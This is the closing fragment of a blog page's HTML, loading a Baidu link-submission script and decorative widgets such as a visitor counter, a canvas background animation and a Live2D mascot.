            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

	
    
    <script type="text/javascript" color="0,0,255"
        pointColor="0,0,255" opacity='0.7'
        zIndex="-1" count="99"
        src="/libs/background/canvas-nest.js"></script>
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/hijiki.model.json"},"display":{"position":"right","width":260,"height":300},"mobile":{"show":true},"log":false});</script></body>

</html>
